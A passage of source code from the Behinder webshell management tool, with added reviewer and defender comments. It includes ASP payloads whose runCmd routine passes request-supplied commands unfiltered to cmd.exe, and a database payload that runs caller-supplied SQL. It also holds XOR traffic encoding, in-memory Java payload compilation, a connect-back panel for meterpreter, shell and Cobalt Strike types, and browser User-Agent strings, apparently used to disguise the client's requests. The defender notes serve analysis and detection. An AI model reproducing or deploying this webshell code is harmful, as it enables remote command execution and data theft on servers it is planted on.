错误源:"&Err.Source&"
"
48 | End If
49 | End Function
' Returns a new ADODB.Stream COM object; the caller configures, opens and closes it.
50 | Function GetStream()
51 | Set GetStream=CreateObject("Adodb.Stream")
52 | End Function
' Returns a Scripting.FileSystemObject created through Server.CreateObject.
' NOTE(review): the ProgID is passed through the variable Key rather than written
' inline in the call, so a content rule for this file should match on the ProgID
' string itself and not on a literal CreateObject("...") pattern.
53 | Function GetFso()
54 | Dim Fso,Key
55 | Key="Scripting.FileSystemObject"
56 | Set Fso=server.CreateObject(Key)
57 | Set GetFso=Fso
58 | End Function
' Reads the file at FilePath and returns its text.
'   FilePath - path supplied by the caller; no validation or root restriction is applied here.
'   A        - "Stream" selects ADODB.Stream (text mode, charset gbk); any other value
'              selects FileSystemObject.OpenTextFile(...).ReadAll.
' Returns Empty when FilePath is "" (FileRead is never assigned in that case).
' Errors are suppressed by "on error resume next"; only the FileSystemObject branch
' inspects Err, and it reports through status/message, which are not declared in this
' function (presumably script-level variables - confirm). GetErr is defined outside this view.
59 | Function FileRead(FilePath,A)
60 | on error resume next
61 | If FilePath<>"" then
62 | Dim Stream,filecontent,Fso
63 | If A="Stream" then
64 | Set Stream=GetStream()
65 | with Stream
' type=2 is text mode; mode=3 is read/write
66 | .type=2
67 | .mode=3
68 | .open
69 | .charset="gbk"
70 | .LoadFromFile FilePath
71 | filecontent=.ReadText()
72 | .close
73 | End With
74 |
75 | Set Stream=Nothing
76 | Else
77 | Set Fso=GetFso()
78 | filecontent=Fso.OpenTextFile(FilePath).ReadAll
79 | If Err Then
80 | status="fail"
81 | message=GetErr(err)
82 | End If
83 | Set Fso=Nothing
84 | End If
85 | FileRead=filecontent
86 | End If
87 | End Function
88 |
' Server-side command execution handler of the payload.
'   cmd - command line taken from the request arguments; it is appended to "cmd.exe /c "
'         without any filtering.
' Tries the COM ProgIDs WScript.shell, WScript.shell.1, shell.application and
' shell.application.1 in that order. With a WScript.Shell object the command's stdout and
' stderr are captured into message; with Shell.Application the command is started with a
' hidden window (last argument 0) and no output is captured.
' The response always carries status "success", even when no COM object could be created.
' It is a JSON object with Base64 fields, passed through Encrypt and written as raw bytes.
' Base64Encode and Encrypt are not defined in the visible part of this file.
' Defender notes: the observable behaviour is cmd.exe started as a child of the IIS worker
' process, and a binary (non-HTML) response body from an .asp page. Denying the application
' pool identity access to the WScript.Shell and Shell.Application COM classes removes both
' execution paths used here.
89 | Sub runCmd(cmd)
90 | on error resume Next
91 | Dim ws,sa
92 | Set ws=server.createobject("WScript.shell")
93 | If IsEmpty(ws) Then
94 | Set ws=server.createobject("WScript.shell.1")
95 | End If
96 | If IsEmpty(ws) Then
97 | Set sa=server.createobject("shell.application")
98 | End If
99 | If IsEmpty(ws) And IsEmpty(sa) Then
100 | Set sa=server.createobject("shell.application.1")
101 | End If
102 |
103 |
104 | If Not IsEmpty(ws) Then
105 | Set process=ws.exec("cmd.exe /c "&cmd)
106 | cmdResult=process.stdout.readall
107 | cmdResult=cmdResult&process.stderr.readall
108 | 'cmdResult=Replace(cmdResult,vbCrLf,"")
109 | message=cmdResult
110 | End If
111 |
112 | If Not IsEmpty(sa) Then
113 | sa.ShellExecute "cmd.exe","/c "&cmd,"","open",0
114 | End If
115 | finalResult="{""status"":"""&Base64Encode("success")&""",""msg"":"""&Base64Encode(message)&"""}"
116 | Response.binarywrite(Encrypt(finalResult))
117 | End Sub
118 |
' Entry point of this payload: the first argument is passed unchanged to runCmd.
119 | Sub main(arrArgs)
120 | cmd=arrArgs(0)
121 | runCmd(cmd)
122 | End Sub
123 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/asp/Database.asp:
--------------------------------------------------------------------------------
' Returns the Base64 encoding of sText's UTF-8 bytes, with line feeds removed.
' The encoding is done by an MSXML DOM node of dataType "bin.base64".
1 | Function Base64Encode(sText)
2 | Dim oXML, oNode
3 |
4 | Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
5 | Set oNode = oXML.CreateElement("base64")
6 | oNode.dataType = "bin.base64"
7 | oNode.nodeTypedValue =Stream_StringToBinary(sText)
' "77u/" is the Base64 form of the UTF-8 byte-order mark (EF BB BF); it is dropped here
8 | If Mid(oNode.text,1,4)="77u/" Then
9 | oNode.text=Mid(oNode.text,5)
10 | End If
11 | Base64Encode = Replace(oNode.text, vbLf, "")
12 | Set oNode = Nothing
13 | Set oXML = Nothing
14 | End Function
15 |
' Converts Text to a byte array: the text is written to an ADODB.Stream as UTF-8, the
' stream is switched to binary type and read back from position 0.
16 | Function Stream_StringToBinary(Text)
17 | Const adTypeText = 2
18 | Const adTypeBinary = 1
19 | Dim BinaryStream 'As New Stream
20 | Set BinaryStream = CreateObject("ADODB.Stream")
21 | BinaryStream.Type = adTypeText
22 | BinaryStream.CharSet = "utf-8"
23 | BinaryStream.Open
24 | BinaryStream.WriteText Text
' Position is reset before the type change and again before the read
25 | BinaryStream.Position = 0
26 | BinaryStream.Type = adTypeBinary
27 | BinaryStream.Position = 0
28 | Stream_StringToBinary = BinaryStream.Read
29 | Set BinaryStream = Nothing
30 | End Function
31 |
' XORs every character of data with a character of the key stored in Session("k") and
' returns the result as a byte string built with ChrB.
' Key position is (i And 15)+1 with i counted from 1, so the key repeats every 16
' characters and the first data character is combined with the second key character.
' presumably the key is at least 16 characters long - confirm where Session("k") is set.
' NOTE(review): this is a repeating-key XOR, not a cipher. Every response in this file
' starts with the fixed prefix {"status":" so captured responses give an analyst known
' plaintext, and anyone holding the session key can decode the traffic.
32 | Function Encrypt(data)
33 | key=Session("k")
34 | size=len(data)
35 | For i=1 To size
36 | encryptResult=encryptResult&chrb(asc(mid(data,i,1)) Xor Asc(Mid(key,(i and 15)+1,1)))
37 | Next
38 | Encrypt=encryptResult
39 | End Function
40 |
' Error check: when Err is set, sends a status "fail" response and ends the request.
' The message is Err.Description followed by "Error Source:" and Err.Source. It is sent
' as Base64 fields in a JSON object passed through Encrypt. Does nothing when Err is not set.
41 | Sub SendErr(Err)' error-handling check
42 | If Err Then
43 | message= Err.Description&"Error Source:"&Err.Source
44 | finalResult="{""status"":"""&Base64Encode("fail")&""",""msg"":"""&Base64Encode(message)&"""}"
45 | Response.binarywrite(Encrypt(finalResult))
46 | 'Response.write(finalResult)
47 | Response.End
48 | End If
49 | End Sub
50 |
51 |
52 |
' Entry point of the database payload: connects to a SQL Server instance chosen by the
' caller and runs a caller-supplied SQL statement.
'   arrArgs(0..6) - dbType, host, port, username, pass, database, sql.
'                   dbType is read but not used in the visible code.
' The connection string is built by plain concatenation with provider SQLOLEDB over the
' TCP/IP network library (DBMSSOCN). sql is passed to conn.Execute unchanged.
' The result is a hand-built JSON-like string: field names first, then one array per row.
' Values are not escaped and every list ends with a trailing comma, so the output is not
' strict JSON.
' SendErr only acts when Err is set. A non-empty conn.Errors collection with Err clear
' does not stop execution, and "on error resume next" hides later failures.
' Defender notes: the observable behaviour is the web application process opening a SQL
' Server connection to a host and port taken from the request. Egress rules for the web
' tier and database audit logs are where this shows up.
53 | Sub main(arrArgs)
54 | on error resume next
55 | dbType=arrArgs(0)
56 | host=arrArgs(1)
57 | port=arrArgs(2)
58 | username=arrArgs(3)
59 | pass=arrArgs(4)
60 | database=arrArgs(5)
61 | sql=arrArgs(6)
62 |
63 | Dim conn
64 | Set conn = Server.CreateObject("ADODB.Connection")
65 | Dim ds
66 | ds = host & "," & port
67 | Dim connString
68 | If IsEmpty(database) or database="" Then
69 | connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;User Id=" & username & ";Password=" & pass & ";"
70 | Else
71 | connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & username & ";Password=" & pass & ";"
72 | End If
73 | conn.Open connString
74 |
75 | If conn.Errors.Count > 0 Then
76 | SendErr Err
77 | End If
78 |
79 | Set rs = conn.Execute(sql)
80 | If conn.Errors.Count > 0 Then
81 | SendErr Err
82 | Else
' fieldArr is filled with the column names but is not read again in this Sub
83 | Dim fieldArr,filedNum
84 | filedNum=rs.Fields.count
85 | ReDim fieldArr(filedNum-1)
86 | For i=0 To filedNum-1
87 | fieldArr(i)=rs.Fields(i).Name
88 | Next
89 | finalResult="["
90 | finalResult=finalResult&"["
91 | For Each objField in rs.Fields
92 | finalResult=finalResult&"{""name"":"""&objField.Name&"""},"
93 | Next
94 | finalResult=finalResult&"]"
95 |
96 | While Not rs.EOF
97 | rowStr=",["
98 |
99 | For Each objField in rs.Fields
100 | rowStr=rowStr&""""&rs(objField.Name)&""","
101 | 'Response.Write "" & rs(objField.Name) & " | "
102 | Next
103 | rowStr=rowStr&"]"
104 | finalResult=finalResult&rowStr
105 | rs.MoveNext
106 | Wend
107 | finalResult=finalResult&"]"
108 | rs.Close
109 | End If
110 | conn.Close
111 | Set conn = Nothing
112 | finalResult="{""status"":"""&Base64Encode("success")&""",""msg"":"""&Base64Encode(finalResult)&"""}"
113 | Response.binarywrite(Encrypt(finalResult))
114 | End Sub
115 |
116 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/Run.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import javax.tools.*;
4 | import javax.tools.JavaCompiler.CompilationTask;
5 | import java.io.File;
6 | import java.util.ArrayList;
7 | import java.util.Arrays;
8 | import java.util.Iterator;
9 | import java.util.List;
10 | import java.util.regex.Matcher;
11 | import java.util.regex.Pattern;
12 |
// In-memory Java compilation helper: turns a source string into class-file bytes with the
// JDK's system compiler. Nothing is written to disk by the code visible here.
// MyJavaFileObject is defined outside this view.
13 | public class Run {
14 | public Run() {
15 | }
16 |
17 | public static void main(String[] args) {
18 | (new Run()).test();
19 | }
20 |
// Leftover test harness: var1 holds a sample class source but is never used, and the
// method then sleeps in an endless loop until interrupted.
21 | public void test() {
22 | String var1 = "\r\nimport javax.servlet.jsp.PageContext;\r\nimport javax.servlet.ServletOutputStream;\r\npublic class test\r\n{\r\n\tpublic boolean equals(Object obj){\r\n\r\n\tPageContext page = (PageContext) obj;\r\n\t\t\ttry {\r\n\t\t\t\tServletOutputStream so=page.getResponse().getOutputStream();\r\n\t\t\t\tso.write(\"afsddf\".getBytes(\"UTF-8\"));\r\n\t\t\t\tso.flush();\r\n\t\t\t\tso.close();\r\n\t\t\t\tpage.getOut().clear(); \r\n\t\t\t} catch (Exception e) {\r\n\t\t\t\t// TODO Auto-generated catch block\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} \r\n\t\treturn true;\r\n}\r\n}";
23 |
24 | try {
25 | while (true) {
26 | Thread.sleep(2000L);
27 | }
28 | } catch (Exception var3) {
29 | var3.printStackTrace();
30 | }
31 | }
32 |
// Compiles sourceCode and returns the bytes of the class whose name is the first match of
// "class <identifier>" in the text (the regex also matches inside comments or strings).
// Throws IllegalArgumentException when no class name is found, and Exception when no
// system compiler is available or when compilation fails (message of the first diagnostic).
// Returns null when the shared map holds no output for the class name.
// Compilation uses -source 1.6 / -target 1.6.
// NOTE(review): the output is looked up in the static map
// CustomClassloaderJavaFileManager.fileObjects, which is shared by all callers and keyed
// only by class name; concurrent compilations of same-named classes would overwrite each other.
33 | public static byte[] getClassFromSourceCode(String sourceCode) throws Exception {
34 | byte[] classBytes = null;
35 | Pattern CLASS_PATTERN = Pattern.compile("class\\s+([$_a-zA-Z][$_a-zA-Z0-9]*)\\s*");
36 | Matcher matcher = CLASS_PATTERN.matcher(sourceCode);
37 | if (matcher.find()) {
38 | String cls = matcher.group(1);
39 | JavaCompiler jc = ToolProvider.getSystemJavaCompiler();
40 | if (jc == null) {
41 | throw new Exception("本地机器上没有找到编译环境,请确认:1.是否安装了JDK环境;2." + System.getProperty("java.home") + File.separator + "lib目录下是否有tools.jar.");
42 | } else {
43 | StandardJavaFileManager standardJavaFileManager = jc.getStandardFileManager(null, null, null);
44 | JavaFileManager fileManager = new CustomClassloaderJavaFileManager(Run.class.getClassLoader(), standardJavaFileManager);
45 | JavaFileObject javaFileObject = new MyJavaFileObject(cls, sourceCode);
46 | List options = new ArrayList();
47 | options.add("-source");
48 | options.add("1.6");
49 | options.add("-target");
50 | options.add("1.6");
51 | DiagnosticCollector collector = new DiagnosticCollector();
52 | CompilationTask cTask = jc.getTask(null, fileManager, collector, options, null, Arrays.asList(javaFileObject));
53 | boolean result = cTask.call();
54 | if (!result) {
// only the first diagnostic is reported; a failure with no diagnostics falls through
55 | List diagnostics = collector.getDiagnostics();
56 | Iterator var14 = diagnostics.iterator();
57 | if (var14.hasNext()) {
58 | Diagnostic diagnostic = (Diagnostic) var14.next();
59 | throw new Exception(diagnostic.getMessage(null));
60 | }
61 | }
62 |
63 | JavaFileObject fileObject = (JavaFileObject) CustomClassloaderJavaFileManager.fileObjects.get(cls);
64 | if (fileObject != null) {
65 | classBytes = ((MyJavaFileObject) fileObject).getCompiledBytes();
66 | }
67 |
68 | return classBytes;
69 | }
70 | } else {
71 | throw new IllegalArgumentException("No such class name in " + sourceCode);
72 | }
73 | }
74 | }
75 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/controller/ReverseViewController.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.ui.controller;
2 |
3 | import javafx.application.Platform;
4 | import javafx.fxml.FXML;
5 | import javafx.scene.control.*;
6 | import net.rebeyond.behinder.core.ShellService;
7 | import net.rebeyond.behinder.dao.ShellManager;
8 | import org.json.JSONObject;
9 |
10 | import java.util.List;
11 |
// JavaFX controller for the client's "reverse connection" panel. It collects an IP, a port
// and a connection type from the form and passes them to ShellService.connectBack.
// ShellService and ShellManager are project classes defined outside this view.
12 | public class ReverseViewController {
13 | private ShellManager shellManager;
14 | @FXML
15 | private TextField reverseIPText;
16 | @FXML
17 | private TextField reversePortText;
18 | @FXML
19 | private RadioButton reverseTypeMeterRadio;
20 | @FXML
21 | private RadioButton reverseTypeShellRadio;
22 | @FXML
23 | private RadioButton reverseTypeColbatRadio;
24 | @FXML
25 | private Button reverseButton;
26 | @FXML
27 | private TextArea reverseHelpTextArea;
28 | private ShellService currentShellService;
29 | private JSONObject shellEntity;
30 | private List workList;
31 | private Label statusLabel;
32 |
33 | public ReverseViewController() {
34 | }
35 |
// Stores the service, the shared worker list and the status label, then wires up the form.
// workList receives every worker thread this controller starts.
36 | public void init(ShellService shellService, List workList, Label statusLabel) {
37 | this.currentShellService = shellService;
38 | this.shellEntity = shellService.getShellEntity();
39 | this.workList = workList;
40 | this.statusLabel = statusLabel;
41 | this.initReverseView();
42 | }
43 |
// Groups the three radio buttons (user data "meter", "shell", "colbat") and installs the
// button handler. The handler runs on a new thread so the UI thread is not blocked; all
// label updates go through Platform.runLater.
// The IP and port text is passed on as entered; no validation happens in this class.
44 | private void initReverseView() {
45 | ToggleGroup radioGroup = new ToggleGroup();
46 | this.reverseTypeMeterRadio.setToggleGroup(radioGroup);
47 | this.reverseTypeShellRadio.setToggleGroup(radioGroup);
48 | this.reverseTypeColbatRadio.setToggleGroup(radioGroup);
49 | this.reverseTypeMeterRadio.setUserData("meter");
50 | this.reverseTypeShellRadio.setUserData("shell");
51 | this.reverseTypeColbatRadio.setUserData("colbat");
52 | this.reverseButton.setOnAction((event) -> {
53 | Runnable runner = () -> {
54 | try {
55 | String targetIP = this.reverseIPText.getText();
56 | String targetPort = this.reversePortText.getText();
57 | RadioButton currentTypeRadio = (RadioButton) radioGroup.getSelectedToggle();
58 | if (currentTypeRadio == null) {
59 | Platform.runLater(() -> {
60 | this.statusLabel.setText("请先选择反弹类型。");
61 | });
62 | return;
63 | }
64 |
65 | String type = currentTypeRadio.getUserData().toString();
66 | JSONObject resultObj = this.currentShellService.connectBack(type, targetIP, targetPort);
// the result object carries "status" and, on failure, "msg"
67 | String status = resultObj.getString("status");
68 | if (status.equals("fail")) {
69 | Platform.runLater(() -> {
70 | String msg = resultObj.getString("msg");
71 | this.statusLabel.setText("反弹失败:" + msg);
72 | });
73 | } else {
74 | Platform.runLater(() -> {
75 | this.statusLabel.setText("反弹成功。");
76 | });
77 | }
78 | } catch (Exception var8) {
79 | var8.printStackTrace();
80 | Platform.runLater(() -> {
81 | this.statusLabel.setText("操作失败:" + var8.getMessage());
82 | });
83 | }
84 |
85 | };
86 | Thread worker = new Thread(runner);
87 | this.workList.add(worker);
88 | worker.start();
89 | });
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/core/Constants.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.core;
2 |
// Client-wide constants. Every field is public, static and non-final, so any code can
// reassign it at run time.
3 | public class Constants {
// Fixed list of browser User-Agent strings (Chrome 84, Safari 13.1.2, Firefox 79, IE 10/11).
// presumably one is chosen for the client's outgoing HTTP requests - confirm against callers.
// Defender note: the list is static, so these exact strings are a weak traffic indicator
// for this client version, worth combining with other signals.
4 | public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", 
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
5 | public static String VERSION = "v3.0 Beta 4 ";
// Context-menu flags: MENU_ALL (69905) is the sum of the five flags above it
6 | public static int MENU_CUT = 1;
7 | public static int MENU_COPY = 16;
8 | public static int MENU_PASTE = 256;
9 | public static int MENU_CLEAR = 4096;
10 | public static int MENU_SELECT_ALL = 65536;
11 | public static int MENU_ALL = 69905;
// Transport encoding selector read by Crypt.EncryptForPhp / Crypt.DecryptForPhp
12 | public static int ENCRYPT_TYPE_AES = 0;
13 | public static int ENCRYPT_TYPE_XOR = 1;
14 | public static int REALCMD_RUNNING = 0;
15 | public static int REALCMD_STOPPED = 1;
16 | public static int PROXY_ENABLE = 0;
17 | public static int PROXY_DISABLE = 1;
18 | public static int COLUMN_DATA_TYPE_INT = 0;
19 | public static int COLUMN_DATA_TYPE_STRING = 1;
20 | public static int FILE_TYPE_DIRECTORY = 0;
21 | public static int FILE_TYPE_FILE = 1;
// Server-side script families the client has payloads for
22 | public static int SCRIPT_TYPE_ASP = 0;
23 | public static int SCRIPT_TYPE_ASPX = 1;
24 | public static int SCRIPT_TYPE_PHP = 2;
25 | public static int SCRIPT_TYPE_JAVA = 3;
26 | public static int PLUGIN_TYPE_SCAN = 0;
27 | public static int PLUGIN_TYPE_EXPLOIT = 1;
28 | public static int PLUGIN_TYPE_TOOL = 2;
29 | public static int PLUGIN_TYPE_OTHER = 3;
// Lower-case cookie attribute names; presumably used to tell attributes apart from
// name=value pairs when parsing Set-Cookie - confirm against callers.
30 | public static String[] cookieProperty = new String[]{"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"};
31 |
32 | public Constants() {
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/java,jetbrains,gradle
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=java,jetbrains,gradle
4 |
5 | ### Java ###
6 | # Compiled class file
7 | # *.class
8 |
9 | # Log file
10 | *.log
11 |
12 | # BlueJ files
13 | *.ctxt
14 |
15 | # Mobile Tools for Java (J2ME)
16 | .mtj.tmp/
17 |
18 | # Package Files #
19 | *.jar
20 | *.war
21 | *.nar
22 | *.ear
23 | *.zip
24 | *.tar.gz
25 | *.rar
26 |
27 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
28 | hs_err_pid*
29 |
30 | ### JetBrains ###
31 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
32 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
33 |
34 | # User-specific stuff
35 | .idea/**/workspace.xml
36 | .idea/**/tasks.xml
37 | .idea/**/usage.statistics.xml
38 | .idea/**/dictionaries
39 | .idea/**/shelf
40 |
41 | # Generated files
42 | .idea/**/contentModel.xml
43 |
44 | # Sensitive or high-churn files
45 | .idea/**/dataSources/
46 | .idea/**/dataSources.ids
47 | .idea/**/dataSources.local.xml
48 | .idea/**/sqlDataSources.xml
49 | .idea/**/dynamic.xml
50 | .idea/**/uiDesigner.xml
51 | .idea/**/dbnavigator.xml
52 |
53 | # Gradle
54 | .idea/**/gradle.xml
55 | .idea/**/libraries
56 |
57 | # Gradle and Maven with auto-import
58 | # When using Gradle or Maven with auto-import, you should exclude module files,
59 | # since they will be recreated, and may cause churn. Uncomment if using
60 | # auto-import.
61 | # .idea/artifacts
62 | # .idea/compiler.xml
63 | # .idea/jarRepositories.xml
64 | # .idea/modules.xml
65 | # .idea/*.iml
66 | # .idea/modules
67 | # *.iml
68 | # *.ipr
69 |
70 | # CMake
71 | cmake-build-*/
72 |
73 | # Mongo Explorer plugin
74 | .idea/**/mongoSettings.xml
75 |
76 | # File-based project format
77 | *.iws
78 |
79 | # IntelliJ
80 | out/
81 |
82 | # mpeltonen/sbt-idea plugin
83 | .idea_modules/
84 |
85 | # JIRA plugin
86 | atlassian-ide-plugin.xml
87 |
88 | # Cursive Clojure plugin
89 | .idea/replstate.xml
90 |
91 | # Crashlytics plugin (for Android Studio and IntelliJ)
92 | com_crashlytics_export_strings.xml
93 | crashlytics.properties
94 | crashlytics-build.properties
95 | fabric.properties
96 |
97 | # Editor-based Rest Client
98 | .idea/httpRequests
99 |
100 | # Android studio 3.1+ serialized cache file
101 | .idea/caches/build_file_checksums.ser
102 |
103 | ### JetBrains Patch ###
104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
105 |
106 | # *.iml
107 | # modules.xml
108 | # .idea/misc.xml
109 | # *.ipr
110 |
111 | # Sonarlint plugin
112 | # https://plugins.jetbrains.com/plugin/7973-sonarlint
113 | .idea/**/sonarlint/
114 |
115 | # SonarQube Plugin
116 | # https://plugins.jetbrains.com/plugin/7238-sonarqube-community-plugin
117 | .idea/**/sonarIssues.xml
118 |
119 | # Markdown Navigator plugin
120 | # https://plugins.jetbrains.com/plugin/7896-markdown-navigator-enhanced
121 | .idea/**/markdown-navigator.xml
122 | .idea/**/markdown-navigator-enh.xml
123 | .idea/**/markdown-navigator/
124 |
125 | # Cache file creation bug
126 | # See https://youtrack.jetbrains.com/issue/JBR-2257
127 | .idea/$CACHE_FILE$
128 |
129 | # CodeStream plugin
130 | # https://plugins.jetbrains.com/plugin/12206-codestream
131 | .idea/codestream.xml
132 |
133 | ### Gradle ###
134 | .gradle
135 | build/
136 |
137 | # Ignore Gradle GUI config
138 | gradle-app.setting
139 |
140 | # Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored)
141 | !gradle-wrapper.jar
142 |
143 | # Cache of project
144 | .gradletasknamecache
145 |
146 | # # Work around https://youtrack.jetbrains.com/issue/IDEA-116898
147 | # gradle/wrapper/gradle-wrapper.properties
148 |
149 | ### Gradle Patch ###
150 | **/build/
151 |
152 | # End of https://www.toptal.com/developers/gitignore/api/java,jetbrains,gradle
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/CustomClassloaderJavaFileManager.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import javax.tools.*;
4 | import javax.tools.JavaFileObject.Kind;
5 | import java.io.IOException;
6 | import java.util.Collections;
7 | import java.util.Iterator;
8 | import java.util.Map;
9 | import java.util.Set;
10 | import java.util.concurrent.ConcurrentHashMap;
11 |
// JavaFileManager used for in-memory compilation. Compiler output is captured in a map
// instead of being written to disk, and class-path lookups for non-"java." packages go
// through PackageInternalsFinder. Most other calls are delegated to the standard manager.
// PackageInternalsFinder, CustomJavaFileObject and MyJavaFileObject are outside this view.
12 | public class CustomClassloaderJavaFileManager implements JavaFileManager {
13 | private final ClassLoader classLoader;
14 | private final StandardJavaFileManager standardFileManager;
15 | private final PackageInternalsFinder finder;
// Shared by every instance and keyed by class name; nothing in this class removes entries
16 | public static Map fileObjects = new ConcurrentHashMap();
17 |
18 | public CustomClassloaderJavaFileManager(ClassLoader classLoader, StandardJavaFileManager standardFileManager) {
19 | this.classLoader = classLoader;
20 | this.standardFileManager = standardFileManager;
21 | this.finder = new PackageInternalsFinder(classLoader);
22 | }
23 |
// Returns the standard manager's loader for the location, not the loader passed to the constructor
24 | public ClassLoader getClassLoader(Location location) {
25 | return this.standardFileManager.getClassLoader(location);
26 | }
27 |
28 | public String inferBinaryName(Location location, JavaFileObject file) {
29 | return file instanceof CustomJavaFileObject ? ((CustomJavaFileObject) file).binaryName() : this.standardFileManager.inferBinaryName(location, file);
30 | }
31 |
32 | public boolean isSameFile(FileObject a, FileObject b) {
33 | return this.standardFileManager.isSameFile(a, b);
34 | }
35 |
36 | public boolean handleOption(String current, Iterator remaining) {
37 | return this.standardFileManager.handleOption(current, remaining);
38 | }
39 |
// Only the class path and the platform class path are reported as known locations
40 | public boolean hasLocation(Location location) {
41 | return location == StandardLocation.CLASS_PATH || location == StandardLocation.PLATFORM_CLASS_PATH;
42 | }
43 |
// Looks the class up in the shared map.
// NOTE(review): when the map has no entry the standard manager is called but its result
// is discarded, so this method returns null in that case.
44 | public JavaFileObject getJavaFileForInput(Location location, String className, Kind kind) throws IOException {
45 | JavaFileObject javaFileObject = (JavaFileObject) fileObjects.get(className);
46 | if (javaFileObject == null) {
47 | this.standardFileManager.getJavaFileForInput(location, className, kind);
48 | }
49 |
50 | return javaFileObject;
51 | }
52 |
// Creates an in-memory output object and registers it under className, replacing any
// earlier entry of the same name; location and sibling are ignored
53 | public JavaFileObject getJavaFileForOutput(Location location, String className, Kind kind, FileObject sibling) throws IOException {
54 | JavaFileObject javaFileObject = new MyJavaFileObject(className, kind);
55 | fileObjects.put(className, javaFileObject);
56 | return javaFileObject;
57 | }
58 |
59 | public FileObject getFileForInput(Location location, String packageName, String relativeName) throws IOException {
60 | return this.standardFileManager.getFileForInput(location, packageName, relativeName);
61 | }
62 |
63 | public FileObject getFileForOutput(Location location, String packageName, String relativeName, FileObject sibling) throws IOException {
64 | return this.standardFileManager.getFileForOutput(location, packageName, relativeName, sibling);
65 | }
66 |
67 | public void flush() throws IOException {
68 | this.standardFileManager.flush();
69 | }
70 |
71 | public void close() throws IOException {
72 | this.standardFileManager.close();
73 | }
74 |
// Platform classes come from the standard manager. Class-path requests for .class files
// come from the standard manager for "java." packages and from the finder otherwise.
// Any other request yields an empty list.
75 | public Iterable list(Location location, String packageName, Set kinds, boolean recurse) throws IOException {
76 | if (location == StandardLocation.PLATFORM_CLASS_PATH) {
77 | return this.standardFileManager.list(location, packageName, kinds, recurse);
